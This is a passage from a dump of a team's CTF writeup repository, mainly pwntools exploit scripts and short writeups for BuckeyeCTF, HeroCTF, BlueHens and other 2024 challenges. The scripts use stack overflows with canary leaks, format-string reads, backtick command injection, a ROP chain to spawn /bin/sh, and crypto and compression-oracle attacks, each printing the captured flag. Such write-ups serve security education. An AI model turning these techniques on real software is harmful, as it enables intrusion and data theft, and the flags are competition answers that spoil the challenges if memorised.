str("10016").encode()) 17 | 18 | p.readuntil(b"That is: ") 19 | line = p.readline() 20 | canary = u64(line[-11:-3]) 21 | 22 | payload = b"" 23 | payload += b"A" * 0x28 24 | payload += p64(canary) 25 | payload += p64(0) 26 | payload += p64(elf.sym["win"] + 0x17) 27 | p.sendline(payload) 28 | 29 | p.readuntil(b"here: ") 30 | 31 | p.sendline(b"/bin/cat flag.txt") 32 | 33 | p.interactive() # bctf{cAn4r13S_L0v3_t0_34t_P13_c760f8cc0a44fed9} 34 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/color/color.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/color/color.zip -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/color/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import re 5 | 6 | #context.log_level = "debug" 7 | p = remote("challs.pwnoh.io", 13370) 8 | 9 | p.sendline(b"A" * 0x20) 10 | 11 | # bctf{1_d0n7_c4r3_571ll_4_m1d_c010r} 12 | print(re.search(r"bctf{.+}", p.readline().decode())[0]) 13 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/color/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2449 2 | 3 | # color (pwn) 4 | 5 | What's your favorite color? 
6 | 7 | nc challs.pwnoh.io 13370 8 | 9 | ## Analysis 10 | 11 | We can see that these two buffers are adjacent, so if `FAVORITE_COLOR` contained `b"A" * 20`, string-based operations which assume the presence of a null terminator would treat both buffers as a single string (note that the buffer is `0x20` bytes long and the script below sends `0x20` `A`s, so that no terminator is left inside `FAVORITE_COLOR`): 12 | 13 | ```C 14 | char FAVORITE_COLOR[0x20]; 15 | char FLAG[0x28]; 16 | ``` 17 | 18 | ## Solution 19 | 20 | 1) Set `FAVORITE_COLOR` to `b"A" * 20` 21 | 2) Allow `printf("%s!?!? Mid af color\n", FAVORITE_COLOR);` to print the flag 22 | 23 | ```python 24 | #!/usr/bin/env python3 25 | 26 | from pwn import * 27 | import re 28 | 29 | #context.log_level = "debug" 30 | p = remote("challs.pwnoh.io", 13370) 31 | 32 | p.sendline(b"A" * 0x20) 33 | 34 | # bctf{1_d0n7_c4r3_571ll_4_m1d_c010r} 35 | print(re.search(r"bctf{.+}", p.readline().decode())[0]) 36 | ``` 37 | 38 | ## Flag 39 | `bctf{1_d0n7_c4r3_571ll_4_m1d_c010r}` 40 | 41 | smiley 2024/09/29 42 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/no_handouts/no_handouts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/no_handouts/no_handouts.zip -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway0/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("challs.pwnoh.io", 13400) 7 | 8 | p.sendline(b"`cat flag.txt`") 9 | 10 | p.interactive() # bctf{0v3rfl0w_th3_M00m0ry_2d310e3de286658e} 11 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway0/runway0.zip: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/runway0/runway0.zip -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway0/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2449 2 | 3 | # runway0 (pwn) 4 | 5 | If you've never done a CTF before, this runway should help! 6 | 7 | Hint: MacOS users (on M series) will need a x86 Linux VM. Tutorial is here: pwnoh.io/utm 8 | 9 | nc challs.pwnoh.io 13400 10 | 11 | ## Analysis 12 | 13 | We can see that whatever we supply is inserted between two `"`s as an argument to `cowsay` and then passed to `system`. 14 | 15 | This should allow us to easily run a command during the evaluation of `cowsay`'s arguments using backticks or `$(...)`. Double quotes do not stop the shell from performing command substitution, so quoting the input is not enough; the program would have to run `cowsay` without a shell, passing the text as a separate argument, to avoid this. 16 | 17 | ## Solution 18 | 19 | ```python 20 | #!/usr/bin/env python3 21 | 22 | from pwn import * 23 | 24 | #context.log_level = "debug" 25 | p = remote("challs.pwnoh.io", 13400) 26 | 27 | p.sendline(b"`cat flag.txt`") 28 | 29 | p.interactive() # bctf{0v3rfl0w_th3_M00m0ry_2d310e3de286658e} 30 | ``` 31 | 32 | ## Flag 33 | `bctf{0v3rfl0w_th3_M00m0ry_2d310e3de286658e}` 34 | 35 | smiley 2024/09/29 36 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway1/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./runway1", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("challs.pwnoh.io", 13401) 12 | 13 | payload = b"" 14 | payload += b"A" * 0x4c 15 | payload += p64(elf.sym["win"]) 16 | 17 | p.sendlineafter(b"food?\n", payload) 18 | 19 | p.sendline(b"/bin/cat flag.txt") 20 | 21 | p.interactive() # 
bctf{I_34t_fl4GS_4_bR34kf4st_7c639e33ffcfe8c2} 22 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway1/runway1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/runway1/runway1.zip -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./runway2", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b win") 11 | p = remote("challs.pwnoh.io", 13402) 12 | 13 | payload = b"" 14 | payload += b"A" * 0x1c 15 | payload += p32(elf.sym["win"]) 16 | payload += p32(0) 17 | payload += p32(0xc0ffee) 18 | payload += p32(0x007ab1e) 19 | 20 | p.sendlineafter(b"?\n", payload) 21 | 22 | p.readline() 23 | 24 | p.sendline(b"/bin/cat flag.txt") 25 | 26 | p.interactive() # bctf{I_m1sS_4r1thm3t1c_qu1ZZ3s_2349adb53baa2955} 27 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway2/runway2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/runway2/runway2.zip -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway3/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./runway3", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = 
elf.debug(gdbscript="") 11 | p = remote("challs.pwnoh.io", 13403) 12 | 13 | p.sendlineafter(b"?\n", b"%13$p") 14 | canary = int(p.readline().decode(), 16) 15 | 16 | payload = b"A" * 0x28 17 | payload += p64(canary) 18 | payload += p64(0) 19 | payload += p64(elf.sym["win"] + 0x17) 20 | 21 | p.sendline(payload) 22 | 23 | p.recv(0x28) 24 | 25 | p.sendline(b"/bin/cat flag.txt") 26 | 27 | p.interactive() # bctf{wh0_kn3w_pr1nt1ng_w4s_s0_d4nG3R0Us_11aabc3287e74603} 28 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway3/runway3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/runway3/runway3.zip -------------------------------------------------------------------------------- /2024_10_12_BlueWaterCTF24/README.md: -------------------------------------------------------------------------------- 1 | # Blue Water CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2479 4 | 5 | 28th place 607 points 6 | -------------------------------------------------------------------------------- /2024_10_12_BlueWaterCTF24/crypto/MD5.01/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from os import system 5 | 6 | # https://github.com/brimstone/fastcoll 7 | 8 | system("./fastcoll -o msg1.bin msg2.bin") 9 | 10 | m1 = open("msg1.bin", "rb").read().hex() 11 | m2 = open("msg2.bin", "rb").read().hex() 12 | 13 | p = remote("md5-01.chal.perfect.blue", 1337) 14 | 15 | p.sendlineafter(b"m1 > ", m1.encode()) 16 | p.sendlineafter(b"m2 > ", m2.encode()) 17 | 18 | p.interactive() 19 | -------------------------------------------------------------------------------- /2024_10_12_BlueWaterCTF24/rev/maybe_Checker/maybe_checker: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_12_BlueWaterCTF24/rev/maybe_Checker/maybe_checker -------------------------------------------------------------------------------- /2024_10_19_SunshineCTF24/README.md: -------------------------------------------------------------------------------- 1 | # Sunshine CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2485 4 | 5 | 65th place 1068 points 6 | -------------------------------------------------------------------------------- /2024_10_19_SunshineCTF24/pwn/adventure_on_the_high_c/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tjoconnor/bin-hosting 2 | 3 | #RUN apt-get update -qq -y && apt-get -qq -y install gdb git python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3-pwntools tmux 4 | #RUN git clone https://github.com/pwndbg/pwndbg && cd pwndbg && ./setup.sh 5 | 6 | COPY ship.bin /chal 7 | COPY flag.txt /flag.txt 8 | -------------------------------------------------------------------------------- /2024_10_19_SunshineCTF24/pwn/adventure_on_the_high_c/ship.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_19_SunshineCTF24/pwn/adventure_on_the_high_c/ship.bin -------------------------------------------------------------------------------- /2024_10_19_SunshineCTF24/pwn/flag_shop/flagshop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_19_SunshineCTF24/pwn/flag_shop/flagshop -------------------------------------------------------------------------------- /2024_10_19_SunshineCTF24/pwn/flag_shop/go.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./flagshop", checksec=False) 7 | context.binary = elf 8 | 9 | p = remote("2024.sunshinectf.games", 24001) 10 | 11 | p.sendline(b"smiley") 12 | p.sendline(b"he/him") 13 | 14 | payload = b"\x01\x00" 15 | payload += b"A" * 8 16 | payload += b"%9$s" 17 | payload = payload.ljust(0x2a, b"\x01") 18 | p.sendline(payload) 19 | 20 | p.sendlineafter(b"1)", b"1") 21 | 22 | p.readuntil(b"current user: ") 23 | flag = p.readuntil(b"}").decode() 24 | 25 | log.success(flag) # sun{c@n_st1ll_r3@d_off_the_he@p_fr0m_st@ck_po!nters!} 26 | 27 | -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/README.md: -------------------------------------------------------------------------------- 1 | # Hero CTF v6 2024 Writeups 2 | 3 | https://ctftime.org/event/2496 4 | 5 | 91st place 1402 points 6 | -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/crypto/halloween/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("crypto.heroctf.fr", 9001) 7 | 8 | c1 = p.readline().decode()[39:(77*2)+39] 9 | 10 | p1 = b"A" * 77 11 | for i in range(0x100): 12 | p.sendline(p1.hex().encode()) 13 | c2 = p.readline().decode() 14 | 15 | key_stream = xor(bytes.fromhex(c1), bytes.fromhex(c2)) 16 | flag = xor(key_stream, p1).decode() 17 | print(flag) # Hero{5p00ky_5c4ry_fl4w3d_cryp70_1mpl3m3n74710ns_53nd_5h1v3r5_d0wn_y0ur_5p1n3} 18 | -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/crypto/halloween/halloween.zip: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_25_HeroCTF24/crypto/halloween/halloween.zip -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/crypto/interpolation/interpolation.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_25_HeroCTF24/crypto/interpolation/interpolation.zip -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/crypto/paranoia/paranoia.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_25_HeroCTF24/crypto/paranoia/paranoia.zip -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/pwn/bankrupst/bankrupst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_25_HeroCTF24/pwn/bankrupst/bankrupst -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/pwn/bankrupst/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./bankrupst", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("pwn.heroctf.fr", 6001) 12 | 13 | p.sendlineafter(b"Choose an option: ", b"1") 14 | 15 | for i in range(10): 16 | p.sendlineafter(b"Choose an option:", b"2") 17 | p.sendlineafter(b"deposit?", b"100") 18 | 19 | p.sendlineafter(b"Choose an option: ", b"6") 20 | 21 | p.sendlineafter(b"Choose an option: ", b"1") 22 | 23 | for i 
in range(4): 24 | p.sendlineafter(b"Choose an option:", b"2") 25 | p.sendlineafter(b"deposit?", b"100") 26 | 27 | p.sendlineafter(b"Choose an option: ", b"4") 28 | 29 | p.readuntil(b"member!\n") 30 | 31 | log.success(p.readline().decode()) # Hero{B4nkk_Rupst3dDd!!1x33x7} 32 | -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/pwn/heappie/heappie.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_25_HeroCTF24/pwn/heappie/heappie.zip -------------------------------------------------------------------------------- /2024_11_01_HackTheVote24/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Vote 2024 Writeups 2 | 3 | https://ctftime.org/event/2498 4 | 5 | 107th place 101 points 6 | -------------------------------------------------------------------------------- /2024_11_01_HackTheVote24/pwn/comma_club/comma-club.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_01_HackTheVote24/pwn/comma_club/comma-club.tar.gz -------------------------------------------------------------------------------- /2024_11_01_HackTheVote24/pwn/comma_club/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | while True: 6 | with remote("comma-club.chal.hackthe.vote", 1337) as p: 7 | p.sendlineafter(b"> ", b"3") 8 | p.sendlineafter(b"> ", b"\x00") 9 | if b"Correct" in p.readline(): 10 | p.sendlineafter(b"exit.", b"/bin/cat flag") 11 | p.interactive() # flag{w3lc0me_2_TH3_2_c0mm4_c1ub} 12 | break 13 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/README.md: 
-------------------------------------------------------------------------------- 1 | # Blue Hens CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2512 4 | 5 | 26th place 4758 points 6 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/crypto/intro_to_rsa/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | c = 9015202564552492364962954854291908723653545972440223723318311631007329746475 4 | n = 51328431690246050000196200646927542588629192646276628974445855970986472407007 5 | e = 65537 6 | 7 | # sage: n = 51328431690246050000196200646927542588629192646276628974445855970986472407007 8 | # sage: n.factor() 9 | # 186574907923363749257839451561965615541 * 275108975057510790219027682719040831427 10 | 11 | p = 186574907923363749257839451561965615541 12 | q = 275108975057510790219027682719040831427 13 | d = pow(e, -1, (p-1)*(q-1)) 14 | m = pow(c, d, n) 15 | flag = m.to_bytes(length=(m.bit_length() + 7) // 8).decode() 16 | print(flag) # udctf{just_4_s1mpl3_RS4} 17 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/crypto/intro_to_rsa/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2512 2 | 3 | # Intro To RSA (crypto) 4 | 5 | ```python 6 | In [9]: p = getPrime(128) 7 | In [10]: q = getPrime(128) 8 | In [11]: N = p*q 9 | In [12]: bytes_to_long(flag) < N 10 | Out[12]: True 11 | In [13]: print(pow(bytes_to_long(flag), 65537, N), N) 12 | 9015202564552492364962954854291908723653545972440223723318311631007329746475 51328431690246050000196200646927542588629192646276628974445855970986472407007 13 | ``` 14 | 15 | ## Solution 16 | 17 | ```python 18 | #!/usr/bin/env python3 19 | 20 | c = 9015202564552492364962954854291908723653545972440223723318311631007329746475 21 | n = 
51328431690246050000196200646927542588629192646276628974445855970986472407007 22 | e = 65537 23 | 24 | # sage: n = 51328431690246050000196200646927542588629192646276628974445855970986472407007 25 | # sage: n.factor() 26 | # 186574907923363749257839451561965615541 * 275108975057510790219027682719040831427 27 | 28 | p = 186574907923363749257839451561965615541 29 | q = 275108975057510790219027682719040831427 30 | d = pow(e, -1, (p-1)*(q-1)) 31 | m = pow(c, d, n) 32 | flag = m.to_bytes(length=(m.bit_length() + 7) // 8).decode() 33 | print(flag) # udctf{just_4_s1mpl3_RS4} 34 | ``` 35 | 36 | ## Flag 37 | `udctf{just_4_s1mpl3_RS4}` 38 | 39 | smiley 2024/11/10 40 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/intro_to_pwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./pwnme", checksec=True) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("0.cloud.chals.io", 13545) 12 | 13 | payload = b"" 14 | payload += b"A" * 0x38 15 | payload += p64(elf.sym["win"] + 8) 16 | p.sendline(payload) 17 | 18 | p.sendline(b"/bin/cat flag.txt") 19 | 20 | p.interactive() # udctf{h00r4y_I_am_a_pwn3r_n0w} 21 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/intro_to_pwn/pwnme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_10_BlueHens24/pwn/intro_to_pwn/pwnme -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/pure_write_what_where/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | 
context.log_level = "critical" 6 | elf = ELF("./pwnme", checksec=True) 7 | context.binary = elf 8 | 9 | while True: 10 | try: 11 | with remote("0.cloud.chals.io", 16612) as p: 12 | p.sendline(str(60).encode()) 13 | p.sendline(str((elf.sym["win"] + 8) & 0xffff).encode()) 14 | p.sendline(b"/bin/cat flag.txt") 15 | p.readline() 16 | p.readline() 17 | flag = p.readline() 18 | if b"udctf{" in flag: 19 | print(flag.decode()) # udctf{th3_0n3_1n_s1xt33n_pwn_str4t_FTW} 20 | break 21 | except: 22 | continue 23 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/pure_write_what_where/pwnme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_10_BlueHens24/pwn/pure_write_what_where/pwnme -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/ret2bf/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./pwnme", checksec=False) 7 | context.binary = elf 8 | 9 | libc = ELF("./libc.so.6", checksec=False) 10 | 11 | #p = elf.process() 12 | #p = elf.debug(gdbscript="b bf") # +241 13 | p = remote("0.cloud.chals.io", 31782) 14 | 15 | payload = b"" 16 | payload += b">" * 120 17 | payload += b".>" * 8 18 | payload += b"<" * 40 19 | payload += b",>-" # use this to return to main 20 | p.sendlineafter(b">", payload) 21 | 22 | leak = b"" 23 | for i in range(8): 24 | leak = leak + p.recv(1) 25 | leak = u64(leak) 26 | 27 | libc.address = leak - 0x29d90 28 | log.success(f"libc.address {hex(libc.address)}") 29 | 30 | p.send(b"\xbc") # last byte of ret main for ret2main 31 | 32 | rop = ROP(libc) 33 | rop.rsi = 0 34 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 35 | rop.rdx = 0 36 | rop.rax = constants.SYS_execve 37 | 
rop.raw(rop.find_gadget(['syscall', 'ret'])[0]) 38 | ropchain = rop.chain() 39 | 40 | payload = b"" 41 | payload += b">" * 88 42 | payload += b",>" * len(ropchain) # use this to return to libc 43 | p.sendlineafter(b">", payload) 44 | 45 | p.send(ropchain) 46 | 47 | p.interactive() # udctf{I_b3t_th4t_f3lt_s0_g00d} 48 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/ret2bf/ret2bf.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_10_BlueHens24/pwn/ret2bf/ret2bf.zip -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/web/just-a-day-at-the-breach/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import requests 4 | import string 5 | 6 | def guess_big(w): 7 | REMOTE = ( 8 | "https://55nlig2es7hyrhvzcxzboyp4xe0nzjrc.lambda-url.us-east-1.on.aws/?payload=" 9 | + w 10 | ) 11 | res = requests.get(REMOTE) 12 | print(bytes.fromhex(w), res.text, flush=True) 13 | print("---", flush=True) 14 | return res.json() 15 | 16 | flag = b"udctf{" 17 | for _ in range(64): 18 | for c in string.ascii_letters + string.digits + string.punctuation: 19 | c = c.encode() 20 | j = guess_big((flag + c).hex())["sniffed"] 21 | 22 | if j < 68: 23 | max = j 24 | flag = flag + c 25 | break 26 | print(f"DEBUGPRINT[12]: lab1.py:49: flag={flag}") 27 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/web/just-a-day-at-the-breach/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2512 2 | 3 | # just a day at the breach (web) 4 | 5 | zlib compress challenge 6 | 7 | ## Solution 8 | 9 | The challenge gives an oracle that shows the message length. 
10 | So we can guess every character, and if the length changes, that's the correct character. Presumably the server compresses our payload together with the flag, so a guess that continues the flag compresses better and the reported length drops; the script below treats a length under 68 as a hit. 11 | Example: 12 | `uu` -> 67 13 | `ub` -> 68 14 | 15 | ```python 16 | #!/usr/bin/env python3 17 | 18 | import requests 19 | import string 20 | 21 | def guess_big(w): 22 | REMOTE = ( 23 | "https://55nlig2es7hyrhvzcxzboyp4xe0nzjrc.lambda-url.us-east-1.on.aws/?payload=" 24 | + w 25 | ) 26 | res = requests.get(REMOTE) 27 | print(bytes.fromhex(w), res.text, flush=True) 28 | print("---", flush=True) 29 | return res.json() 30 | 31 | flag = b"udctf{" 32 | for _ in range(64): 33 | for c in string.ascii_letters + string.digits + string.punctuation: 34 | c = c.encode() 35 | j = guess_big((flag + c).hex())["sniffed"] 36 | 37 | if j < 68: 38 | max = j 39 | flag = flag + c 40 | break 41 | print(f"DEBUGPRINT[12]: lab1.py:49: flag={flag}") 42 | ``` 43 | 44 | ## Flag 45 | `udctf{huffm4n_br34ched_l3t5_go}` 46 | 47 | shafouz 2024/11/10 48 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/xor/cbc_encrypted/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import requests 5 | 6 | url = "https://vbbfgwcc6dnuzlawkslmxvlni40zkayu.lambda-url.us-east-1.on.aws/" 7 | response = requests.get(url) 8 | data = response.json() 9 | token = data["token"] 10 | iv = bytes.fromhex(data["iv"]) 11 | log.success(data) 12 | 13 | known_plaintext = b'{"role":"guest",' 14 | wanted_plaintext = b'{"role":"admin",' 15 | iv = xor(xor(iv, known_plaintext), wanted_plaintext) 16 | 17 | url = "https://vbbfgwcc6dnuzlawkslmxvlni40zkayu.lambda-url.us-east-1.on.aws/?token=" + token + "&iv=" + iv.hex() 18 | response = requests.get(url) 19 | data = response.json() 20 | flag = data["flag"] 21 | log.success(flag) # udctf{1v_m4n1pul4t10n_FTW_just_anoth3r_x0R_4pplic4tion} 22 | -------------------------------------------------------------------------------- 
/2024_11_10_BlueHens24/xor/ctr_mode_is_just_xor/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import requests 5 | 6 | url = "https://i8fgyps3o2.execute-api.us-east-1.amazonaws.com/default/ctrmode?pt=00" 7 | response = requests.get(url) 8 | data = response.json() 9 | probiv = data["probiv"] # GPEq6Sqzy6dLmeM 10 | flagenc = data["flagenc"] 11 | log.success(data) 12 | 13 | iv = unhex(probiv) + b"\x00" + unhex(probiv) + b"\x01" + unhex(probiv) + b"\x02" + unhex(probiv) + b"\x03" 14 | 15 | url = "https://i8fgyps3o2.execute-api.us-east-1.amazonaws.com/default/ctrmode?pt=" + iv.hex() 16 | response = requests.get(url) 17 | data = response.json() 18 | ciphertext = data["ciphertext"] 19 | log.success(data) 20 | 21 | flag = xor(bytes.fromhex(ciphertext), bytes.fromhex(flagenc))[:50].decode() 22 | print(flag) # UDCTF{th3r3_15_n0_sp00n_y0uv3_alr34dy_d3c1d3d_NE0} 23 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/xor/ctr_mode_is_just_xor/lambda.py: -------------------------------------------------------------------------------- 1 | #LIVE AT https://i8fgyps3o2.execute-api.us-east-1.amazonaws.com/default/ctrmode?pt=00 2 | 3 | import json 4 | import os 5 | import sys 6 | from Crypto.Cipher import AES 7 | from Crypto.Util.Padding import pad, unpad 8 | 9 | 10 | def lambda_handler(event, context): 11 | pt=bytes.fromhex(event["queryStringParameters"]["pt"]) 12 | padded = pad(pt, 16) 13 | 14 | probiv = os.environ["probiv"] 15 | flag = os.environ["flag"] 16 | padflag = pad(flag.encode(), 16) 17 | flagcipher = AES.new(os.environ["secretkey"].encode(), AES.MODE_CTR, nonce=probiv.encode()) 18 | pct = flagcipher.encrypt(padflag) 19 | 20 | yourcipher = AES.new(os.environ["secretkey"].encode(), AES.MODE_ECB) 21 | try: 22 | encrypted = yourcipher.encrypt(padded) 23 | except ValueError as e: 24 | return {'statusCode': 500, "error": str(e)} 
25 | 26 | return { 27 | 'statusCode': 200, 28 | 'body': json.dumps({"ciphertext": encrypted.hex(), "probiv": probiv.encode().hex(), "flagenc": pct.hex()}) 29 | } 30 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/xor/roman_xor/romanXor.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import os 3 | f=open("poems.txt","r") 4 | lngstr=f.read() 5 | f.close() 6 | lines = lngstr.split("\n") 7 | lines = list(filter(lambda x: len(x) > 30, lines)) 8 | import random 9 | winners = [random.choice(lines) for _ in range(10)] 10 | def simple(ltr): 11 | return ltr.isalpha() or ltr == " " 12 | 13 | pts = ["".join(filter(simple, x)).strip().lower() for x in winners] + ["udctf{placeholder_flag_here}"] 14 | key = os.urandom(100) 15 | cts = [xor(x.encode(),key[:len(x)]).hex() for x in pts] 16 | print(cts) -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/xor/xor_without_xor/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | flag = 'u_cnfrj_sr_b_34}yd1tt{0upt04lbmb' 6 | print((flag*32)[::17][:32]) # udctf{just_4_b4by_1ntr0_pr0bl3m} 7 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/README.md: -------------------------------------------------------------------------------- 1 | # 1337 UP LIVE 2024 Writeups 2 | 3 | https://ctftime.org/event/2446 4 | 5 | 217th place 962 points 6 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/crypto/krsa/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("krsa.ctf.intigriti.io", 1346) 7 | #p = process(["python3", "./kRSA.py"]) 8 | 9 | 
